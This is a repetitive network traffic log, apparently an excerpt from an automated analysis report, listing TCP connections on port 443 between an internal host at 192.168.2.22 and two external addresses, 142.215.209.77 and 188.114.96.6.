              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
